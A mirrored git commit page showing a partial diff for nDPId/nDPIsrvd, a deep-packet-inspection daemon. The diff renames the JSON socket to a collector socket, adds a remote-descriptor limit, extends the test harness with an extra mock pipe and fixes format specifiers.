scottk/nDPId-2
1
0
Fork 0
mirror of https://github.com/optim-enterprises-bv/nDPId-2.git synced 2025-10-30 01:42:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Disconnect nDPIsrvd clients immediately instead waiting for a failed write().

Browse Source 
* nDPIsrvd: Collector/Distributor logging improved
 * nDPIsrvd: Command line option for max remote descriptors
 * nDPId: Stop spamming nDPIsrvd Collector with the same events over and over again
 * nDPId: Refactored some variable names and events

Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
This commit is contained in:
Toni Uhlig
2022-03-13 02:28:10 +01:00
parent dd35d9da3f
commit ed1647b944
43 changed files with 23888 additions and 23623 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
CMakeLists.txt
View File

@@ -243,7 +243,7 @@ endif()
find_package(PCAP "1.8.1" REQUIRED) find_package(PCAP "1.8.1" REQUIRED)
target_compile_options(nDPId PRIVATE "-pthread") target_compile_options(nDPId PRIVATE "-pthread")
target_compile_definitions(nDPId PRIVATE -DGIT_VERSION=\"${GIT_VERSION}\" ${NDPID_DEFS} ${ZLIB_DEFS}) target_compile_definitions(nDPId PRIVATE -D_GNU_SOURCE=1 -DGIT_VERSION=\"${GIT_VERSION}\" ${NDPID_DEFS} ${ZLIB_DEFS})
target_include_directories(nDPId PRIVATE target_include_directories(nDPId PRIVATE
"${STATIC_LIBNDPI_INC}" "${NDPI_INCLUDEDIR}" "${NDPI_INCLUDEDIR}/ndpi") "${STATIC_LIBNDPI_INC}" "${NDPI_INCLUDEDIR}" "${NDPI_INCLUDEDIR}/ndpi")
target_link_libraries(nDPId "${STATIC_LIBNDPI_LIB}" "${pkgcfg_lib_NDPI_ndpi}" target_link_libraries(nDPId "${STATIC_LIBNDPI_LIB}" "${pkgcfg_lib_NDPI_ndpi}"
@@ -251,7 +251,7 @@ target_link_libraries(nDPId "${STATIC_LIBNDPI_LIB}" "${pkgcfg_lib_NDPI_ndpi}"
"${GCRYPT_LIBRARY}" "${GCRYPT_ERROR_LIBRARY}" "${PCAP_LIBRARY}" "${LIBM_LIB}" "${GCRYPT_LIBRARY}" "${GCRYPT_ERROR_LIBRARY}" "${PCAP_LIBRARY}" "${LIBM_LIB}"
"-pthread") "-pthread")
target_compile_definitions(nDPIsrvd PRIVATE -DGIT_VERSION=\"${GIT_VERSION}\" ${NDPID_DEFS}) target_compile_definitions(nDPIsrvd PRIVATE -D_GNU_SOURCE=1 -DGIT_VERSION=\"${GIT_VERSION}\" ${NDPID_DEFS})
target_include_directories(nDPIsrvd PRIVATE target_include_directories(nDPIsrvd PRIVATE
"${CMAKE_SOURCE_DIR}" "${CMAKE_SOURCE_DIR}"
"${CMAKE_SOURCE_DIR}/dependencies" "${CMAKE_SOURCE_DIR}/dependencies"

1
config.h
View File

@@ -38,6 +38,7 @@
/* nDPIsrvd default config options */ /* nDPIsrvd default config options */
#define nDPIsrvd_PIDFILE "/tmp/ndpisrvd.pid" #define nDPIsrvd_PIDFILE "/tmp/ndpisrvd.pid"
#define nDPIsrvd_MAX_REMOTE_DESCRIPTORS 32
#define nDPIsrvd_CACHE_ARRAY_LENGTH 256 #define nDPIsrvd_CACHE_ARRAY_LENGTH 256
#endif #endif

2
dependencies/nDPIsrvd.py vendored
View File

@@ -122,6 +122,8 @@ class Instance:
return self.getThreadData(json_dict['thread_id']).most_recent_flow_time return self.getThreadData(json_dict['thread_id']).most_recent_flow_time
def setMostRecentFlowTimeFromJSON(self, json_dict): def setMostRecentFlowTimeFromJSON(self, json_dict):
if 'thread_id' not in json_dict:
return
thread_id = json_dict['thread_id'] thread_id = json_dict['thread_id']
if 'thread_ts_msec' in json_dict: if 'thread_ts_msec' in json_dict:
mrtf = self.getMostRecentFlowTime(thread_id) if thread_id in self.thread_data else 0 mrtf = self.getMostRecentFlowTime(thread_id) if thread_id in self.thread_data else 0

5
examples/c-simple/c-simple.c
View File

@@ -117,9 +117,6 @@ static void simple_flow_cleanup_callback(struct nDPIsrvd_socket * const sock,
int main(int argc, char ** argv) int main(int argc, char ** argv)
{ {
(void)argc;
(void)argv;
signal(SIGUSR1, sighandler); signal(SIGUSR1, sighandler);
signal(SIGINT, sighandler); signal(SIGINT, sighandler);
signal(SIGTERM, sighandler); signal(SIGTERM, sighandler);
@@ -131,7 +128,7 @@ int main(int argc, char ** argv)
return 1; return 1;
} }
if (nDPIsrvd_setup_address(&sock->address, "127.0.0.1:7000") != 0) if (nDPIsrvd_setup_address(&sock->address, (argc > 1 ? argv[1] : "127.0.0.1:7000")) != 0)
{ {
return 1; return 1;
} }

2
examples/py-flow-info/flow-info.py
View File

@@ -231,7 +231,7 @@ def onJsonLineRecvd(json_dict, instance, current_flow, global_user_data):
instance_and_source += '[{}][{}][{:.>2}] '.format( instance_and_source += '[{}][{}][{:.>2}] '.format(
TermColor.setColorByString(instance.alias), TermColor.setColorByString(instance.alias),
TermColor.setColorByString(instance.source), TermColor.setColorByString(instance.source),
json_dict['thread_id']) json_dict['thread_id'] if 'thread_id' in json_dict else '')
else: else:
instance_and_source += ' ' instance_and_source += ' '

74
nDPId-test.c
View File

@@ -21,8 +21,11 @@ enum
PIPE_NULL_WRITE = 1, /* Distributor (data from nDPIsrvd) write */ PIPE_NULL_WRITE = 1, /* Distributor (data from nDPIsrvd) write */
PIPE_NULL_READ = 0, /* Distributor (print to stdout) read */ PIPE_NULL_READ = 0, /* Distributor (print to stdout) read */
PIPE_ARPA_WRITE = 1, /* Distributor (data from nDPIsrvd) write */
PIPE_ARPA_READ = 0, /* Distributor (IP mockup) read */
PIPE_FDS = 2, PIPE_FDS = 2,
MAX_REMOTE_DESCRIPTORS = 3 /* mock pipefd's + 2 * distributor pipefd's */ MAX_REMOTE_DESCRIPTORS = 4 /* mock pipefd's + 2 * distributor pipefd's */
}; };
struct thread_return_value struct thread_return_value
@@ -97,6 +100,7 @@ struct distributor_return_value
static int mock_pipefds[PIPE_FDS] = {}; static int mock_pipefds[PIPE_FDS] = {};
static int mock_testfds[PIPE_FDS] = {}; static int mock_testfds[PIPE_FDS] = {};
static int mock_nullfds[PIPE_FDS] = {}; static int mock_nullfds[PIPE_FDS] = {};
static int mock_arpafds[PIPE_FDS] = {};
static pthread_mutex_t nDPId_start_mutex = PTHREAD_MUTEX_INITIALIZER; static pthread_mutex_t nDPId_start_mutex = PTHREAD_MUTEX_INITIALIZER;
static pthread_mutex_t nDPIsrvd_start_mutex = PTHREAD_MUTEX_INITIALIZER; static pthread_mutex_t nDPIsrvd_start_mutex = PTHREAD_MUTEX_INITIALIZER;
static pthread_mutex_t distributor_start_mutex = PTHREAD_MUTEX_INITIALIZER; static pthread_mutex_t distributor_start_mutex = PTHREAD_MUTEX_INITIALIZER;
@@ -144,6 +148,7 @@ static void * nDPIsrvd_mainloop_thread(void * const arg)
struct remote_desc * mock_json_desc = NULL; struct remote_desc * mock_json_desc = NULL;
struct remote_desc * mock_test_desc = NULL; struct remote_desc * mock_test_desc = NULL;
struct remote_desc * mock_null_desc = NULL; struct remote_desc * mock_null_desc = NULL;
struct remote_desc * mock_arpa_desc = NULL;
struct epoll_event events[32]; struct epoll_event events[32];
size_t const events_size = sizeof(events) / sizeof(events[0]); size_t const events_size = sizeof(events) / sizeof(events[0]);
@@ -153,31 +158,40 @@ static void * nDPIsrvd_mainloop_thread(void * const arg)
THREAD_ERROR_GOTO(arg); THREAD_ERROR_GOTO(arg);
} }
mock_json_desc = get_unused_remote_descriptor(COLLECTOR_UN, mock_pipefds[PIPE_nDPIsrvd], NETWORK_BUFFER_MAX_SIZE); mock_json_desc = get_remote_descriptor(COLLECTOR_UN, mock_pipefds[PIPE_nDPIsrvd], NETWORK_BUFFER_MAX_SIZE);
if (mock_json_desc == NULL) if (mock_json_desc == NULL)
{ {
logger(1, "%s", "nDPIsrvd could not acquire remote descriptor (Collector)"); logger(1, "%s", "nDPIsrvd could not acquire remote descriptor (Collector)");
THREAD_ERROR_GOTO(arg); THREAD_ERROR_GOTO(arg);
} }
mock_test_desc = mock_test_desc = get_remote_descriptor(DISTRIBUTOR_UN, mock_testfds[PIPE_TEST_WRITE], NETWORK_BUFFER_MAX_SIZE / 4);
get_unused_remote_descriptor(DISTRIBUTOR_UN, mock_testfds[PIPE_TEST_WRITE], NETWORK_BUFFER_MAX_SIZE / 4);
if (mock_test_desc == NULL) if (mock_test_desc == NULL)
{ {
logger(1, "%s", "nDPIsrvd could not acquire remote descriptor (TEST Distributor)"); logger(1, "%s", "nDPIsrvd could not acquire remote descriptor (TEST Distributor)");
THREAD_ERROR_GOTO(arg); THREAD_ERROR_GOTO(arg);
} }
mock_null_desc = mock_null_desc = get_remote_descriptor(DISTRIBUTOR_UN, mock_nullfds[PIPE_NULL_WRITE], NETWORK_BUFFER_MAX_SIZE);
get_unused_remote_descriptor(DISTRIBUTOR_UN, mock_nullfds[PIPE_NULL_WRITE], NETWORK_BUFFER_MAX_SIZE);
if (mock_null_desc == NULL) if (mock_null_desc == NULL)
{ {
logger(1, "%s", "nDPIsrvd could not acquire remote descriptor (NULL Distributor)"); logger(1, "%s", "nDPIsrvd could not acquire remote descriptor (NULL Distributor)");
THREAD_ERROR_GOTO(arg); THREAD_ERROR_GOTO(arg);
} }
mock_arpa_desc = get_remote_descriptor(DISTRIBUTOR_IN, mock_arpafds[PIPE_ARPA_WRITE], NETWORK_BUFFER_MAX_SIZE / 8);
if (mock_arpa_desc == NULL)
{
logger(1, "%s", "nDPIsrvd could not acquire remote descriptor (ARPA Distributor)");
THREAD_ERROR_GOTO(arg);
}
strncpy(mock_arpa_desc->event_distributor_in.peer_addr,
"arpa-mockup",
sizeof(mock_arpa_desc->event_distributor_in.peer_addr));
mock_arpa_desc->event_distributor_in.peer.sin_port = 0;
if (add_in_event(epollfd, mock_json_desc) != 0 || add_in_event(epollfd, mock_test_desc) != 0 || if (add_in_event(epollfd, mock_json_desc) != 0 || add_in_event(epollfd, mock_test_desc) != 0 ||
add_in_event(epollfd, mock_null_desc) != 0) add_in_event(epollfd, mock_null_desc) != 0 || add_in_event(epollfd, mock_arpa_desc) != 0)
{ {
logger(1, "%s", "nDPIsrvd add input event failed"); logger(1, "%s", "nDPIsrvd add input event failed");
THREAD_ERROR_GOTO(arg); THREAD_ERROR_GOTO(arg);
@@ -197,7 +211,7 @@ static void * nDPIsrvd_mainloop_thread(void * const arg)
for (int i = 0; i < nready; i++) for (int i = 0; i < nready; i++)
{ {
if (events[i].data.ptr == mock_json_desc || events[i].data.ptr == mock_test_desc || if (events[i].data.ptr == mock_json_desc || events[i].data.ptr == mock_test_desc ||
events[i].data.ptr == mock_null_desc) events[i].data.ptr == mock_null_desc || events[i].data.ptr == mock_arpa_desc)
{ {
if (handle_data_event(epollfd, &events[i]) != 0) if (handle_data_event(epollfd, &events[i]) != 0)
{ {
@@ -224,13 +238,19 @@ error:
{ {
drain_cache_blocking(mock_null_desc); drain_cache_blocking(mock_null_desc);
} }
if (mock_arpa_desc != NULL)
{
drain_cache_blocking(mock_arpa_desc);
}
del_event(epollfd, mock_pipefds[PIPE_nDPIsrvd]); del_event(epollfd, mock_pipefds[PIPE_nDPIsrvd]);
del_event(epollfd, mock_testfds[PIPE_TEST_WRITE]); del_event(epollfd, mock_testfds[PIPE_TEST_WRITE]);
del_event(epollfd, mock_nullfds[PIPE_NULL_WRITE]); del_event(epollfd, mock_nullfds[PIPE_NULL_WRITE]);
del_event(epollfd, mock_arpafds[PIPE_ARPA_WRITE]);
close(mock_pipefds[PIPE_nDPIsrvd]); close(mock_pipefds[PIPE_nDPIsrvd]);
close(mock_testfds[PIPE_TEST_WRITE]); close(mock_testfds[PIPE_TEST_WRITE]);
close(mock_nullfds[PIPE_NULL_WRITE]); close(mock_nullfds[PIPE_NULL_WRITE]);
close(mock_arpafds[PIPE_ARPA_WRITE]);
close(epollfd); close(epollfd);
return NULL; return NULL;
@@ -469,7 +489,7 @@ static void * distributor_client_mainloop_thread(void * const arg)
{ {
int dis_epollfd = create_evq(); int dis_epollfd = create_evq();
int signalfd = setup_signalfd(dis_epollfd); int signalfd = setup_signalfd(dis_epollfd);
int pipe_read_finished = 0, null_read_finished = 0; int pipe_read_finished = 0, null_read_finished = 0, arpa_read_finished = 0;
struct epoll_event events[32]; struct epoll_event events[32];
size_t const events_size = sizeof(events) / sizeof(events[0]); size_t const events_size = sizeof(events) / sizeof(events[0]);
struct distributor_return_value * const drv = (struct distributor_return_value *)arg; struct distributor_return_value * const drv = (struct distributor_return_value *)arg;
@@ -502,12 +522,17 @@ static void * distributor_client_mainloop_thread(void * const arg)
THREAD_ERROR_GOTO(trv); THREAD_ERROR_GOTO(trv);
} }
if (add_in_event_fd(dis_epollfd, mock_arpafds[PIPE_ARPA_READ]) != 0)
{
THREAD_ERROR_GOTO(trv);
}
stats = (struct distributor_global_user_data *)mock_sock->global_user_data; stats = (struct distributor_global_user_data *)mock_sock->global_user_data;
stats->json_string_len_min = (unsigned long long int)-1; stats->json_string_len_min = (unsigned long long int)-1;
pthread_mutex_lock(&distributor_start_mutex); pthread_mutex_lock(&distributor_start_mutex);
while (pipe_read_finished == 0 || null_read_finished == 0) while (pipe_read_finished == 0 || null_read_finished == 0 || arpa_read_finished == 0)
{ {
int nready = epoll_wait(dis_epollfd, events, events_size, -1); int nready = epoll_wait(dis_epollfd, events, events_size, -1);
if (nready < 0 && errno != EINTR) if (nready < 0 && errno != EINTR)
@@ -579,6 +604,27 @@ static void * distributor_client_mainloop_thread(void * const arg)
printf("%.*s", (int)bytes_read, buf); printf("%.*s", (int)bytes_read, buf);
} }
else if (events[i].data.fd == mock_arpafds[PIPE_ARPA_READ])
{
char buf[NETWORK_BUFFER_MAX_SIZE];
ssize_t bytes_read = read(mock_arpafds[PIPE_ARPA_READ], buf, sizeof(buf));
if (bytes_read < 0)
{
logger(1, "Read fd returned an error: %s", strerror(errno));
THREAD_ERROR_GOTO(trv);
}
if (bytes_read == 0)
{
del_event(dis_epollfd, mock_arpafds[PIPE_ARPA_READ]);
arpa_read_finished = 1;
continue;
}
/*
* Nothing to do .. ?
* I am just here to trigger some IP code paths.
*/
}
else if (events[i].data.fd == signalfd) else if (events[i].data.fd == signalfd)
{ {
struct signalfd_siginfo fdsi; struct signalfd_siginfo fdsi;
@@ -627,6 +673,7 @@ error:
del_event(dis_epollfd, signalfd); del_event(dis_epollfd, signalfd);
del_event(dis_epollfd, mock_testfds[PIPE_TEST_READ]); del_event(dis_epollfd, mock_testfds[PIPE_TEST_READ]);
del_event(dis_epollfd, mock_nullfds[PIPE_NULL_READ]); del_event(dis_epollfd, mock_nullfds[PIPE_NULL_READ]);
del_event(dis_epollfd, mock_arpafds[PIPE_ARPA_READ]);
close(dis_epollfd); close(dis_epollfd);
close(signalfd); close(signalfd);
nDPIsrvd_socket_free(&mock_sock); nDPIsrvd_socket_free(&mock_sock);
@@ -646,8 +693,8 @@ static void * nDPId_mainloop_thread(void * const arg)
} }
/* Replace nDPId JSON socket fd with the one in our pipe and hope that no socket specific code-path triggered. */ /* Replace nDPId JSON socket fd with the one in our pipe and hope that no socket specific code-path triggered. */
reader_threads[0].json_sockfd = mock_pipefds[PIPE_nDPId]; reader_threads[0].collector_sockfd = mock_pipefds[PIPE_nDPId];
reader_threads[0].json_sock_reconnect = 0; reader_threads[0].collector_sock_reconnect = 0;
pthread_mutex_lock(&nDPId_start_mutex); pthread_mutex_lock(&nDPId_start_mutex);
@@ -758,7 +805,8 @@ int main(int argc, char ** argv)
return 1; return 1;
} }
if (setup_pipe(mock_pipefds) != 0 || setup_pipe(mock_testfds) != 0 || setup_pipe(mock_nullfds) != 0) if (setup_pipe(mock_pipefds) != 0 || setup_pipe(mock_testfds) != 0 || setup_pipe(mock_nullfds) != 0 ||
setup_pipe(mock_arpafds) != 0)
{ {
return 1; return 1;
} }

380
nDPId.c
View File

@@ -46,8 +46,8 @@
#define DLT_DSA_TAG_EDSA 285 #define DLT_DSA_TAG_EDSA 285
#endif #endif
#if ((NDPI_MAJOR == 3 && NDPI_MINOR < 5) || NDPI_MAJOR < 3) && NDPI_API_VERSION < 4087 #if ((NDPI_MAJOR == 4 && NDPI_MINOR < 4) || NDPI_MAJOR < 4) && NDPI_API_VERSION < 5892
#error "nDPI >= 3.5.0 or API version >= 4087 required" #error "nDPI >= 4.4.0 or API version >= 5892 required"
#endif #endif
#if !defined(__GCC_HAVE_SYNC_COMPARE_AND_SWAP_4) || !defined(__GCC_HAVE_SYNC_COMPARE_AND_SWAP_8) #if !defined(__GCC_HAVE_SYNC_COMPARE_AND_SWAP_4) || !defined(__GCC_HAVE_SYNC_COMPARE_AND_SWAP_8)
@@ -122,7 +122,7 @@ struct nDPId_flow_extended
{ {
struct nDPId_flow_basic flow_basic; struct nDPId_flow_basic flow_basic;
unsigned int long long flow_id; unsigned long long int flow_id;
uint16_t min_l4_payload_len; uint16_t min_l4_payload_len;
uint16_t max_l4_payload_len; uint16_t max_l4_payload_len;
@@ -190,8 +190,13 @@ struct nDPId_workflow
{ {
pcap_t * pcap_handle; pcap_t * pcap_handle;
uint16_t error_or_eof; uint8_t error_or_eof;
uint16_t is_pcap_file; uint8_t is_pcap_file;
uint8_t max_flow_to_track_reached : 1;
uint8_t flow_allocation_already_failed : 1;
uint8_t reserved_00;
unsigned long long int packets_captured; unsigned long long int packets_captured;
unsigned long long int packets_processed; unsigned long long int packets_processed;
@@ -235,9 +240,9 @@ struct nDPId_reader_thread
{ {
struct nDPId_workflow * workflow; struct nDPId_workflow * workflow;
pthread_t thread_id; pthread_t thread_id;
int json_sockfd; int collector_sockfd;
int json_sock_reconnect; int collector_sock_reconnect;
int array_index; size_t array_index;
}; };
enum packet_event enum packet_event
@@ -386,7 +391,7 @@ static struct
char * custom_categories_file; char * custom_categories_file;
char * custom_ja3_file; char * custom_ja3_file;
char * custom_sha1_file; char * custom_sha1_file;
char json_sockpath[UNIX_PATH_MAX]; char collector_sockpath[UNIX_PATH_MAX];
#ifdef ENABLE_ZLIB #ifdef ENABLE_ZLIB
uint8_t enable_zlib_compression; uint8_t enable_zlib_compression;
#endif #endif
@@ -414,7 +419,7 @@ static struct
unsigned long long int max_packets_per_flow_to_process; unsigned long long int max_packets_per_flow_to_process;
} nDPId_options = {.pidfile = nDPId_PIDFILE, } nDPId_options = {.pidfile = nDPId_PIDFILE,
.user = "nobody", .user = "nobody",
.json_sockpath = COLLECTOR_UNIX_SOCKET, .collector_sockpath = COLLECTOR_UNIX_SOCKET,
.max_flows_per_thread = nDPId_MAX_FLOWS_PER_THREAD / 2, .max_flows_per_thread = nDPId_MAX_FLOWS_PER_THREAD / 2,
.max_idle_flows_per_thread = nDPId_MAX_IDLE_FLOWS_PER_THREAD / 2, .max_idle_flows_per_thread = nDPId_MAX_IDLE_FLOWS_PER_THREAD / 2,
.tick_resolution = nDPId_TICK_RESOLUTION, .tick_resolution = nDPId_TICK_RESOLUTION,
@@ -1188,7 +1193,7 @@ static void log_flows(struct nDPId_reader_thread const * const reader_thread)
} }
logger(0, logger(0,
"MemoryProfiler flow stats: [thread: %d][unknown: %llu][skipped: %llu][finished: %llu][info: %llu]", "MemoryProfiler flow stats: [thread: %zu][unknown: %llu][skipped: %llu][finished: %llu][info: %llu]",
reader_thread->array_index, reader_thread->array_index,
log_user_data.flows_ukn, log_user_data.flows_ukn,
log_user_data.flows_skp, log_user_data.flows_skp,
@@ -1199,7 +1204,7 @@ static void log_flows(struct nDPId_reader_thread const * const reader_thread)
if (flows_log_str_used > 0) if (flows_log_str_used > 0)
{ {
logger(0, logger(0,
"MemoryProfiler flows active (finished): [thread: %d][%.*s]", "MemoryProfiler flows active (finished): [thread: %zu][%.*s]",
reader_thread->array_index, reader_thread->array_index,
(int)flows_log_str_used, (int)flows_log_str_used,
flows_log_str); flows_log_str);
@@ -1209,7 +1214,7 @@ static void log_flows(struct nDPId_reader_thread const * const reader_thread)
if (flows_log_str_used > 0) if (flows_log_str_used > 0)
{ {
logger(0, logger(0,
"MemoryProfiler flows active (info): [thread: %d][%.*s]", "MemoryProfiler flows active (info): [thread: %zu][%.*s]",
reader_thread->array_index, reader_thread->array_index,
(int)flows_log_str_used, (int)flows_log_str_used,
flows_log_str); flows_log_str);
@@ -1905,11 +1910,14 @@ static void jsonize_l3_l4(struct nDPId_workflow * const workflow, struct nDPId_f
} }
} }
static void jsonize_basic(struct nDPId_reader_thread * const reader_thread) static void jsonize_basic(struct nDPId_reader_thread * const reader_thread, int serialize_thread_id)
{ {
struct nDPId_workflow * const workflow = reader_thread->workflow; struct nDPId_workflow * const workflow = reader_thread->workflow;
ndpi_serialize_string_int32(&workflow->ndpi_serializer, "thread_id", reader_thread->array_index); if (serialize_thread_id != 0)
{
ndpi_serialize_string_int32(&workflow->ndpi_serializer, "thread_id", reader_thread->array_index);
}
ndpi_serialize_string_uint32(&workflow->ndpi_serializer, "packet_id", workflow->packets_captured); ndpi_serialize_string_uint32(&workflow->ndpi_serializer, "packet_id", workflow->packets_captured);
ndpi_serialize_string_string(&workflow->ndpi_serializer, "source", nDPId_options.pcap_file_or_interface); ndpi_serialize_string_string(&workflow->ndpi_serializer, "source", nDPId_options.pcap_file_or_interface);
ndpi_serialize_string_string(&workflow->ndpi_serializer, "alias", nDPId_options.instance_alias); ndpi_serialize_string_string(&workflow->ndpi_serializer, "alias", nDPId_options.instance_alias);
@@ -1935,7 +1943,7 @@ static void jsonize_daemon(struct nDPId_reader_thread * const reader_thread, enu
ndpi_serialize_string_string(&workflow->ndpi_serializer, ev, daemon_event_name_table[DAEMON_EVENT_INVALID]); ndpi_serialize_string_string(&workflow->ndpi_serializer, ev, daemon_event_name_table[DAEMON_EVENT_INVALID]);
} }
jsonize_basic(reader_thread); jsonize_basic(reader_thread, 1);
switch (event) switch (event)
{ {
@@ -2040,58 +2048,60 @@ static void jsonize_flow(struct nDPId_workflow * const workflow, struct nDPId_fl
ndpi_serialize_string_uint64(&workflow->ndpi_serializer, "thread_ts_msec", workflow->last_thread_time); ndpi_serialize_string_uint64(&workflow->ndpi_serializer, "thread_ts_msec", workflow->last_thread_time);
} }
static int connect_to_json_socket(struct nDPId_reader_thread * const reader_thread) static int connect_to_collector(struct nDPId_reader_thread * const reader_thread)
{ {
struct sockaddr_un saddr; struct sockaddr_un saddr;
if (reader_thread->json_sockfd >= 0) if (reader_thread->collector_sockfd >= 0)
{ {
close(reader_thread->json_sockfd); close(reader_thread->collector_sockfd);
} }
reader_thread->json_sockfd = socket(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0); reader_thread->collector_sockfd = socket(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0);
if (reader_thread->json_sockfd < 0) if (reader_thread->collector_sockfd < 0)
{ {
reader_thread->json_sock_reconnect = 1; reader_thread->collector_sock_reconnect = 1;
return 1; return 1;
} }
int opt = NETWORK_BUFFER_MAX_SIZE * 16; int opt = NETWORK_BUFFER_MAX_SIZE * 16;
if (setsockopt(reader_thread->json_sockfd, SOL_SOCKET, SO_SNDBUF, &opt, sizeof(opt)) < 0) if (setsockopt(reader_thread->collector_sockfd, SOL_SOCKET, SO_SNDBUF, &opt, sizeof(opt)) < 0)
{ {
return 1; return 1;
} }
saddr.sun_family = AF_UNIX; saddr.sun_family = AF_UNIX;
int written = snprintf(saddr.sun_path, sizeof(saddr.sun_path), "%s", nDPId_options.json_sockpath); int written = snprintf(saddr.sun_path, sizeof(saddr.sun_path), "%s", nDPId_options.collector_sockpath);
if (written < 0) if (written < 0)
{ {
return 1; return 1;
} }
if (connect(reader_thread->json_sockfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 0) if (connect(reader_thread->collector_sockfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 0)
{ {
reader_thread->json_sock_reconnect = 1; reader_thread->collector_sock_reconnect = 1;
return 1; return 1;
} }
if (shutdown(reader_thread->json_sockfd, SHUT_RD) != 0) if (shutdown(reader_thread->collector_sockfd, SHUT_RD) != 0)
{ {
return 1; return 1;
} }
if (fcntl(reader_thread->json_sockfd, F_SETFL, fcntl(reader_thread->json_sockfd, F_GETFL, 0) | O_NONBLOCK) == -1) if (fcntl(reader_thread->collector_sockfd,
F_SETFL,
fcntl(reader_thread->collector_sockfd, F_GETFL, 0) | O_NONBLOCK) == -1)
{ {
reader_thread->json_sock_reconnect = 1; reader_thread->collector_sock_reconnect = 1;
return 1; return 1;
} }
reader_thread->json_sock_reconnect = 0; reader_thread->collector_sock_reconnect = 0;
return 0; return 0;
} }
static void send_to_json_sink(struct nDPId_reader_thread * const reader_thread, static void send_to_collector(struct nDPId_reader_thread * const reader_thread,
char const * const json_str, char const * const json_str,
size_t json_str_len) size_t json_str_len)
{ {
@@ -2110,7 +2120,7 @@ static void send_to_json_sink(struct nDPId_reader_thread * const reader_thread,
if (s_ret < 0 || s_ret == (int)sizeof(newline_json_str)) if (s_ret < 0 || s_ret == (int)sizeof(newline_json_str))
{ {
logger(1, logger(1,
"[%8llu, %d] JSON buffer prepare failed: snprintf returned %d, buffer size %zu", "[%8llu, %zu] JSON buffer prepare failed: snprintf returned %d, buffer size %zu",
workflow->packets_captured, workflow->packets_captured,
reader_thread->array_index, reader_thread->array_index,
s_ret, s_ret,
@@ -2118,12 +2128,12 @@ static void send_to_json_sink(struct nDPId_reader_thread * const reader_thread,
return; return;
} }
if (reader_thread->json_sock_reconnect != 0) if (reader_thread->collector_sock_reconnect != 0)
{ {
if (connect_to_json_socket(reader_thread) == 0) if (connect_to_collector(reader_thread) == 0)
{ {
logger(1, logger(1,
"[%8llu, %d] Reconnected to nDPIsrvd Collector", "[%8llu, %zu] Reconnected to nDPIsrvd Collector",
workflow->packets_captured, workflow->packets_captured,
reader_thread->array_index); reader_thread->array_index);
jsonize_daemon(reader_thread, DAEMON_EVENT_RECONNECT); jsonize_daemon(reader_thread, DAEMON_EVENT_RECONNECT);
@@ -2132,35 +2142,38 @@ static void send_to_json_sink(struct nDPId_reader_thread * const reader_thread,
errno = 0; errno = 0;
ssize_t written; ssize_t written;
if (reader_thread->json_sock_reconnect == 0 && if (reader_thread->collector_sock_reconnect == 0 &&
(written = write(reader_thread->json_sockfd, newline_json_str, s_ret)) != s_ret) (written = write(reader_thread->collector_sockfd, newline_json_str, s_ret)) != s_ret)
{ {
saved_errno = errno; saved_errno = errno;
if (saved_errno == EPIPE) if (saved_errno == EPIPE)
{ {
logger(1, logger(1,
"[%8llu, %d] Lost connection to nDPIsrvd Collector", "[%8llu, %zu] Lost connection to nDPIsrvd Collector",
workflow->packets_captured, workflow->packets_captured,
reader_thread->array_index); reader_thread->array_index);
} }
if (saved_errno != EAGAIN) if (saved_errno != EAGAIN)
{ {
reader_thread->json_sock_reconnect = 1; reader_thread->collector_sock_reconnect = 1;
} }
else else
{ {
fcntl(reader_thread->json_sockfd, F_SETFL, fcntl(reader_thread->json_sockfd, F_GETFL, 0) & ~O_NONBLOCK); fcntl(reader_thread->collector_sockfd,
F_SETFL,
fcntl(reader_thread->collector_sockfd, F_GETFL, 0) & ~O_NONBLOCK);
off_t pos = (written < 0 ? 0 : written); off_t pos = (written < 0 ? 0 : written);
while ((written = write(reader_thread->json_sockfd, newline_json_str + pos, s_ret - pos)) != s_ret - pos) while ((written = write(reader_thread->collector_sockfd, newline_json_str + pos, s_ret - pos)) !=
s_ret - pos)
{ {
if (written < 0) if (written < 0)
{ {
logger(1, logger(1,
"[%8llu, %d] Send data (blocking I/O) to nDPIsrvd Collector failed: %s", "[%8llu, %zu] Send data (blocking I/O) to nDPIsrvd Collector failed: %s",
workflow->packets_captured, workflow->packets_captured,
reader_thread->array_index, reader_thread->array_index,
strerror(saved_errno)); strerror(saved_errno));
reader_thread->json_sock_reconnect = 1; reader_thread->collector_sock_reconnect = 1;
break; break;
} }
else else
@@ -2168,7 +2181,9 @@ static void send_to_json_sink(struct nDPId_reader_thread * const reader_thread,
pos += written; pos += written;
} }
} }
fcntl(reader_thread->json_sockfd, F_SETFL, fcntl(reader_thread->json_sockfd, F_GETFL, 0) & O_NONBLOCK); fcntl(reader_thread->collector_sockfd,
F_SETFL,
fcntl(reader_thread->collector_sockfd, F_GETFL, 0) & O_NONBLOCK);
} }
} }
} }
@@ -2182,7 +2197,7 @@ static void serialize_and_send(struct nDPId_reader_thread * const reader_thread)
if (json_str == NULL || json_str_len == 0) if (json_str == NULL || json_str_len == 0)
{ {
logger(1, logger(1,
"[%8llu, %d] jsonize failed, buffer length: %u", "[%8llu, %zu] jsonize failed, buffer length: %u",
reader_thread->workflow->packets_captured, reader_thread->workflow->packets_captured,
reader_thread->array_index, reader_thread->array_index,
json_str_len); json_str_len);
@@ -2190,7 +2205,7 @@ static void serialize_and_send(struct nDPId_reader_thread * const reader_thread)
else else
{ {
reader_thread->workflow->total_events_serialized++; reader_thread->workflow->total_events_serialized++;
send_to_json_sink(reader_thread, json_str, json_str_len); send_to_collector(reader_thread, json_str, json_str_len);
} }
ndpi_reset_serializer(&reader_thread->workflow->ndpi_serializer); ndpi_reset_serializer(&reader_thread->workflow->ndpi_serializer);
} }
@@ -2319,7 +2334,7 @@ static void jsonize_packet_event(struct nDPId_reader_thread * const reader_threa
if (flow_ext == NULL) if (flow_ext == NULL)
{ {
logger(1, logger(1,
"[%8llu, %d] BUG: got a PACKET_EVENT_PAYLOAD_FLOW with a flow pointer equals NULL", "[%8llu, %zu] BUG: got a PACKET_EVENT_PAYLOAD_FLOW with a flow pointer equals NULL",
reader_thread->workflow->packets_captured, reader_thread->workflow->packets_captured,
reader_thread->array_index); reader_thread->array_index);
return; return;
@@ -2340,7 +2355,7 @@ static void jsonize_packet_event(struct nDPId_reader_thread * const reader_threa
